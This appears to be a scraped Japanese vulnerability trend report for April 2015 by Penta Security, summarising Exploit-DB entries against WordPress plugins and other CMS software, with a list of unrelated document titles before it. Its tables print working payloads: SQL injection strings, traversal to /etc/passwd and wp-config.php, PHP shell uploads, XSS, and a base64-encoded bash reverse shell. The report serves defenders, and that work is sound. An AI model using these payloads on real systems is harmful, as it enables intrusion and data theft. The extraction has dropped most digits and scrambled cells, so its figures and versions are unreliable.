EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5



Similar documents
EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー



最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

初心者にもできるアメブロカスタマイズ新2016.pages

- 2 Copyright (C) All Rights Reserved.

untitled

pex7_manual

Copyright All Rights Reserved. -2 -!

FileMaker Pro 15 および FileMaker Pro 15 Advanced インストールおよび新機能ガイド

スライド 1

IPA:セキュアなインターネットサーバー構築に関する調査

LAPLINK ヘルプデスク 導入ガイド

Microsoft Word - 最終版 バックせどりismマニュアル .docx

2

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

untitled

Copyright 2009, SofTek Systems, Inc. All rights reserved.


Releases080909

Copyright Qetic Inc. All Rights Reserved. 2

Cisco® ASA シリーズルーター向けDigiCert® 統合ガイド

システム要件 Trend Micro Safe Lock Trend Micro Safe Lock 2.0 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Windows XP (SP1/

第2回_416.ppt

fb_town

Trend Micro Safe Lock 2.0 Patch1 管理コンソールのシステム要件 OS Windows XP (SP2/SP3) [Professional] Windows 7 (SP なし /SP1) [Professional / Enterprise / Ultimate] W

Flash Player ローカル設定マネージャー

<4D F736F F F696E74202D E A B D682CC91E3955C93498D558C822E707074>

Microsoft Project Project 1984 No.1 Project PMBOK (Project Management Body of Knowledge) 1 2 ( ) 3 3 Project 3 Project Standard/Professional Office Pr

82801pdf.pqxp

システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind

FirePass Edge Client TM Edge Client LAN Edge Client 7.0 Edge Client Edge Client Edge Client Edge Client Edge Client Edge Client LAN Edge Client VPN Wi

実施していただく前に

健康保険組合のあゆみ_top

リバースマップ原稿2

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

Cisco ASA Firepower ASA Firepower

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

% 11.1% +6.% 4, % %+12.2% 54,16 6.6% EV7, ,183 Copyright 216 JAPAN POST GROUP. All Rights Reserved. 1


MultiPASS Suite 3.20 使用説明書

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

Webアプリケーション脆弱性診断 ~WebSiteScan Pro~

Web のクライアントサーバモデル

タイトルを1~2行で入力 (長文の場合はフォントサイズを縮小)

Oracle Change Management Pack, Oracle Diagnostics Pack, Oracle Tuning Packインストレーション・ガイド リリース2.2

Installation and New Features Guide for FileMaker Pro 10 and FileMaker Pro 10 Advanced

Parallels Desktop 7 クイックスタートガイド

MultiPASS B-20 MultiPASS Suite 3.10使用説明書

Ⅴ 古陶器にみる装飾技法

Imperva_page01_B52

Ver.30 改 版 履 歴 版 数 日 付 内 容 担 当 V /09/5 初 版 発 行 STS V /0/8 証 明 書 バックアップ 作 成 とインストール 手 順 追 加 STS V /0/7 文 言 と 画 面 修 正 STS V..30 0//6

untitled

SSB_G_ver1.0_2013.8

やよいの顧客管理

弥生給与/やよいの給与計算

弥生 シリーズ

弥生会計 プロフェッショナル/スタンダード/やよいの青色申告

弥生会計/やよいの青色申告

弥生会計 ネットワーク/プロフェッショナル2ユーザー


Copyright 2008 NIFTY Corporation All rights reserved. 2

The F5 DDoS Mitigation Reference Architecture | F5 White Paper

HTTP Web Web RFC2616 HTTP/1.1 Web Apache Tomcat (Servlet ) XML Xindice Tomcat 6-2

Hitachi Storage Management Pack for VMware vrealize Operations サポートマトリクス (REV.04-00) Hitachi Storage Management Pack - Hitachi Storage Management Pack

/ 11

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

v6

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P P.31

untitled

契約№2020-XXXX

140522_日経BP電子版_「想職」時代

Copyright 2006 KDDI Corporation. All Rights Reserved page1


1000 Copyright(C)2009 All Rights Reserved - 2 -

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

PowerPoint プレゼンテーション

Web Microsoft 2008 R2 Database Database!! Database 04 08

! Copyright 2015 sapoyubi service All Rights Reserved. 2

report03_amanai.pages

report05_sugano.pages

第3回_416.ppt

高度な標的型攻撃:包括的な保護


KASPERSKY ENDPOINT SECURITY FOR BUSINESS IT IT IT IT IT Kaspersky Endpoint Security for Business IT IT IT IT 2013 NAC Advanced 2013 Select Select Work

Transcription:

5.4

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5年4月は Exploit-DBの分析結果をみると SQLインジェクション攻撃による脆弱性が最も多く報告されました そのSQLインジェクション攻撃のほとんどは CMSから発見されました CMSは SQLインジェクション攻撃だけではなく クロス サイト スクリプティング(Cross Site Scripting;XSS)攻撃や ファイルアップロード(File Upload)といった様々な脆弱性が多数発見され 今月に脆弱性が最 も多く報告されたソフトウェアとなっています における脆弱性のほとんどがPluginにて発生しているため のご利用の管理者は 脆弱性の診断やPluginのアップデートを定期的に行い セキュ リティを維持しなければなりません また のソフトウェアからも件の脆弱性が発見されました 当該の脆弱性は ソースコードによるものであり 単純な攻撃パターンだけでも悪用可能です 難易度は易し いレベルであっても 莫大な被害を及ぼす可能性があるため 特別な注意が必要です. 脆弱性別 脆弱性カテゴリ コマンドインジェクション (Command Injection) ファイルアップロード File Upload) クロス サイト スクリプティング Cross Site Scripting:XSS ローカルファイル挿入 Local File Inclusion:LFI SQL インジェクション SQL Injection 9 脆弱性別 3 4 4 3 9 危険度 割合 早急対応要 48% 高 7 5% % % 8 4 8 4 危険度別分類. 危険度別 早急対応要 高 7 3. 攻撃実行の難易度別 難易度 割合 難 8% 9 7% 易 8 55% % 攻撃実行の難易度別 難 8 易 9 4. 主なソフトウェア別脆弱性発生 ソフトウェア名 主なソフトウェア別脆弱性発生 Ericsson phpsfp Balero BlueDragon CFChart Servlet Wolf 5 5 5 Ericsson phpsfp Copyright 5 Penta Security Systems Inc. All rights reserved Balero BlueDragon CFChart Servlet Wolf

EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です 危 険 度 分 類 基 準 早 急 対 応 要 : 攻 撃 が 成 功 した 場 合 システムへ 侵 入 可 高 :システム 情 報 を 取 得 するか あるいはクライアントに 次 被 害 を 及 ぼす : 情 報 漏 洩 攻 撃 実 行 難 易 度 分 類 基 準 難 : 複 数 の を 突 いた 攻 撃 パターン 対 象 のシステムの 重 要 な 情 報 を 取 得 するため 高 度 な 攻 撃 コードを 採 用 したパターン 知 らされていない 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する : 攻 撃 手 法 自 体 は 難 しくないが 迂 回 コードを 採 用 したパターン 易 : 回 のリクエストで 攻 撃 が 成 立 するパターン 複 数 回 トライするも 既 知 の 攻 撃 コードを 採 用 したパターンのいずれかに 該 当 する ** 5 件 以 上 発 生 した 主 なソフトウェア 別 の 詳 細 情 報 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 ソフトウェア 名 34 File Upload 易 早 急 対 応 要 Simple Ads Manager.5.94 - sam-ajax-admin.php File Upload SQL Injection 易 高 Simple Ads Manager Plugin - sam-ajax.php SQL Injection SQL Injection 易 高 Simple Ads Manager Plugin - /sam-ajax-admin.php SQL Injection 3 SQL Injection 難 早 急 対 応 要 Business Intelligence Plugin - view.php SQL Injection 377 SQL Injection 早 急 対 応 要 Traffic Analyzer Plugin 3.4. - / SQL Injection 37 SQL Injection 早 急 対 応 要 All In One WP Security & Firewall 3.9. - admin.php SQL Injection 39 File Upload 易 早 急 対 応 要 Windows Desktop and iphone Photo Uploader Plugin - upload.php File Upload 3735 SQL Injection 早 急 対 応 要 Duplicator <=.5.4 - admin-ajax.php SQL Injection 37 LFI 易 高 Plugin 'WP Mobile Edition'.7 - css.php LFI 37 XSS 易 高 MiwoFTP Plugin..5 - admin.php XSS 375 SQL Injection 易 高 Video Gallery.8 - admin-ajax.php SQL Injection 脆 弱 性 37 LFI 易 高 MiwoFTP Plugin..5 - admin.php LFI 3777 SQL Injection 高 Ajax Store Locator. - admin-ajax.php SQL Injection 385 SQL Injection 易 高 Community Events Plugin.3.5 - / SQL Injection 脆 弱 性 38 SQL Injection 難 早 急 対 応 要 Tune Library Plugin.5.4 - / SQL Injection 38 SQL Injection 早 急 対 応 要 NEX-Forms < 3. - admin-ajax.php SQL Injection 脆 弱 性 384 SQL Injection 易 高 Ultimate Product Catalogue Plugin - / SQL Injection 脆 383 SQL Injection 易 高 Ultimate Product Catalogue Plugin - admin-ajax.php SQL Injection 38 LFI 易 早 急 対 応 要 TheCartPress Plugin.3.9 - admin.php LFI 38 XSS 易 高 TheCartPress Plugin.3.9 - /shopping-cart/checkout/ XSS 38 XSS 易 高 TheCartPress Plugin.3.9 - admin.php XSS Copyright 5 Penta Security Systems Inc. All rights reserved

日 付 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 攻 撃 コード 対 象 プログラム 対 象 環 境 5-4- 39 LFI 早 急 対 応 要 5-4- 3 SQL Injection 難 早 急 対 応 要 5-4- 34 File Upload 易 早 急 対 応 要 EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です Ericsson Drutt MSDP (Instance Monitor) - / LFI phpsfp Schedule Facebook Posts.5. - /index.php/login SQL Injection Simple Ads Manager.5.94 - sam-ajax-admin.php File Upload /..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%fetc/passwd GET /index.php/login HTTP/. Cookie: login= ' or extractvalue(rand(),concat(xe,(select concat_ws(x3a,username,password) from users limit ))) or ' POST /wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5. (compatible; MSIE.; Windows NT.; WOW4; Trident/.) Content-Type: multipart/form-data; boundary=-------------- -------------7dd998f -----------------------------7dd998f Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/octet-stream Ericsson phpsfp Ericsson Drutt MSDP (Instance Monitor) phpsfp - Schedule Facebook Posts.5. plugin Simple Ads Manager.5.94 5-4- SQL Injection 易 高 Simple Ads Manager Plugin - sam-ajax.php SQL Injection <? phpinfo();?> -----------------------------7dd998f-- POST /wp-content/plugins/simple-ads-manager/samajax.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 plugin Simple Ads Manager.5.94 and.5.9 5-4- SQL Injection 易 高 Simple Ads Manager Plugin - /sam-ajax-admin.php SQL Injection action=sam_hits&hits%5b%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&level=3 POST/wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 plugin Simple Ads Manager.5.94 and.5.9 5-4- 3 SQL Injection 難 早 急 対 応 要 5-4- 3 SQL Injection 難 早 急 対 応 要 5-4-5 34 SQL Injection 難 早 急 対 応 要 5-4-8 378 LFI 易 早 急 対 応 要 5-4-8 377 SQL Injection 早 急 対 応 要 5-4-8 375 SQL Injection 高 Spider Random Article Componen - index.php SQL Injection Business Intelligence Plugin - view.php SQL Injection - adsearch.php SQL Injection Configuration Management.3. - /zenworks/uploadservlet LFI 脆 Traffic Analyzer Plugin 3.4. - / SQL Injection 脆 Balero CMS.7. - /balerocms/admin/edit_page/m od-virtual_page/id-sql Injection action=load_posts&cstr= and =&sp=post&spg=page /index.php?option=com_rand&catid=%7%and(sele ct%%from(select%count(*),concat((select% (select%concat(database(),x7,x7e))%from% information_schema.tables%limit%,),floor(ra nd()*))x%from%information_schema.tables% GROUP%BY%x)a)--%- &limit=&style=&view=articles&format=raw&itemid=3 /wp-content/plugins/wp-business-intelligence/view.php?t=7+union+select+,,3,group_concat(table_name), 5,,7,8,9,,+from+information_schema.tables+where +table_schema=database()--% /adsearch.php=action=search&buyitnow=y&buyitnowonly =y&category=%and%= POST /zenworks/uploadservlet?uid=../../../opt/novell/zenworks /share/tomcat/webapps/&filename=payload.war HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 GET / HTTP/. x.x.x.x Referer: BLAH' (SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(3) ) ' POST /balerocms/admin/edit_page/mod-virtual_page/id- HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Spider Random Article Component Business Intelligence Plugin Configuration Management.3. Traffic Analyzer Plugin 3.4. Balero Balero CMS.7. 5-4-8 374 XSS 高 7...3 - adminajax.php XSS id=' and benchmark (5,sha())-- POST/wordpress-install/wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 7...3 5-4-8 37 SQL Injection 早 急 対 応 要 All In One WP Security & Firewall 3.9. - admin.php SQL Injection location[id]='><script>alert(string.fromcharcode(88,83,8 3));</script> /wpadmin/admin.php?page=aiowpsec&tab=tab3&orderby=u ser_id,(select * from (select(sleep(3)))a)&order=asc All In One WP Security & Firewall 3.9. Copyright 5 Penta Security Systems Inc. All rights reserved

EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です 日 付 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 攻 撃 コード 対 象 プログラム 対 象 環 境 5-4-9 39 File Upload 易 早 急 対 応 要 Windows Desktop and iphone Photo Uploader Plugin - upload.php File Upload POST /wordpress/wp-content/plugins/i-dump-iphone-towordpress-photo-uploader/uploader.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5. (compatible; MSIE.; Windows NT.; WOW4; Trident/.) Content-Type: multipart/form-data; boundary=-------------- -------------7dd998f -----------------------------7dd998f Content-Disposition: form-data; name="uploadfile"; filename="file.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd998f-- Windows Desktop and iphone Photo Uploader Plugin 5-4-3 3735 SQL Injection 早 急 対 応 要 Duplicator <=.5.4 - admin-ajax.php SQL Injection POST /wp-admin/adminajax.php?action=duplicator_package_delete HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Duplicator <=.5.4 duplicator_delid= and (select * from (select(sleep()))a) 5-4-3 37 LFI 易 高 5-4-4 37 XSS 易 高 5-4-4 375 SQL Injection 易 高 5-4-4 37 LFI 易 高 Plugin 'WP Mobile Edition'.7 - css.php LFI MiwoFTP Plugin..5 - admin.php XSS Video Gallery.8 - admin-ajax.php SQL Injection 脆 MiwoFTP Plugin..5 - admin.php LFI /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=list&dir=wpcontent"><script>alert()</script>&order=name&srt=yes /wp-admin/admin- ajax.php?action=googleadsense&vid=%and%=- - POST /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=post HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Plugin 'WP Mobile Edition'.7 MiwoFTP Plugin..5 Video Gallery.8 MiwoFTP Plugin..5 5-4- 3777 SQL Injection 高 5-4- 385 LFI 易 高 5-4- 385 SQL Injection 易 高 5-4- 38 SQL Injection 難 早 急 対 応 要 Ajax Store Locator. - admin-ajax.php SQL Injection BlueDragon CFChart Servlet 7...7759 - /cfchart.cfchart LFI Community Events Plugin.3.5 - / SQL Injection 脆 Tune Library Plugin.5.4 - / SQL Injection do_action=delete&first=y&selitems[]=../../../../../pls_mr_ja iler_dont_deleteme.txt /wordpress/wp-admin/adminajax.php?action=sl_dal_searchlocation&funmethod=sear chstore&location=social&storelocation=~ AND (SELECT * FROM (SELECT(SLEEP()))LCKZ) /cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\index.p hp /?page_id=&eventyear=5 AND = )-- &dateset=on&eventday= /?page_id=&artistletter=g' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),databas e()),--% 5-4- 38 SQL Injection 早 急 対 応 要 NEX-Forms < 3. - admin-ajax.php SQL Injection 脆 /wordpress/wp-admin/adminajax.php?action=submit_nex_form&nex_forms_id= AND (SELECT * FROM (SELECT(SLEEP()))NdbE) 5-4- 387 SQL Injection 易 高 3.3-488 - /go_login/validate_credentials/admin/%7%or%% /go_login/validate_credentials/a 7%7%3D%7 dmin/ SQL Injection 5-4- 387 Command Injection 難 早 急 対 応 要 5-4- 388 File Upload 易 高 3.3-488 - /index.php/go_site/cpanel/ Command Injection Wolf CMS.8. - /admin/login/login File Upload /index.php/go_site/cpanel/ bash -c "eval \`echo YmFzaCAtaSA+JiAvZGVL3RjcC8xOTIuMTY4LjAuMTEvN DQNCAwPiYx base4 --decode\`" POST /admin/login/login HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5. (compatible; MSIE.; Windows NT.; WOW4; Trident/.) Content-Type: multipart/form-data; boundary=-------------- -------------7dd998f -----------------------------7dd998f Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream BlueDragon CFChart Servlet Ajax Store Locator. BlueDragon CFChart Servlet 7...7759 Community Events Plugin.3.5 Tune Library Plugin.5.4 NEX- Forms < 3. 3.3-488 3.3-488 Wolf Wolf CMS.8. 5-4-3 384 SQL Injection 易 高 Ultimate Product Catalogue Plugin - / SQL Injection <? phpinfo();?> -----------------------------7dd998f-- /?SingleProduct='+and+'a'='a Ultimate Product Catalogue Plugin Copyright 5 Penta Security Systems Inc. All rights reserved

EDB-Report 最 新 Web トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB(http://exploit-db.com)より 公 開 されている 内 容 に 基 づいた トレンド 情 報 です 日 付 EDB 番 号 カテゴリ 攻 撃 難 易 度 危 険 度 名 攻 撃 コード 対 象 プログラム 対 象 環 境 5-4-3 383 SQL Injection 易 高 Ultimate Product Catalogue Plugin - adminajax.php SQL Injection POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 Ultimate Product Catalogue Plugin 5-4-9 38 SQL Injection 早 急 対 応 要 5-4-9 38 LFI 易 早 急 対 応 要 OS Solution OSProperty.8. - index.php SQL Injection TheCartPress Plugin.3.9 - admin.php LFI Item_ID= AND SLEEP(5)&action=record_view /index.php?option=com_osproperty&no_html=&tmpl=c omponent&task=ajax_loadstateinlistpage&country_id=3 ' UNION ALL SELECT NULL,CONCAT(x7a77,x797774584a4b49547 4d,x7777)# POST /wpadmin/admin.php?page=checkout_editor_settings HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 Chrome/..9.75 Safari/535.7 OS Solution OSProperty.8. TheCartPress Plugin.3.9 5-4-9 38 XSS 易 高 tcp_save_fields=&tcp_box_path=../../../../../etc/passwd POST /shopping-cart/checkout/ HTTP/. User-Agent: Mozilla/5. Windows NT.; WOW4 TheCartPress Plugin Chrome/..9.75 Safari/535.7.3.9 - /shopping-cart/checkout/ XSS TheCartPress Plugin.3.9 5-4-9 38 XSS 易 高 TheCartPress Plugin.3.9 - admin.php XSS selected_billing_id=&selected_billing_address=new&billi ng_firstname="><script>alert(/immuniweb/);</script> /wpadmin/admin.php?page=thecartpress/admin/addresseslis t.php&search_by=-- %3E%%7%%3E%3Cscript%3Ealert%8%7immu niweb%7%9;%3c/script%3e TheCartPress Plugin.3.9 Copyright 5 Penta Security Systems Inc. All rights reserved

2024 © docsplayer.net プライバシー | 利用規約 | フィードバック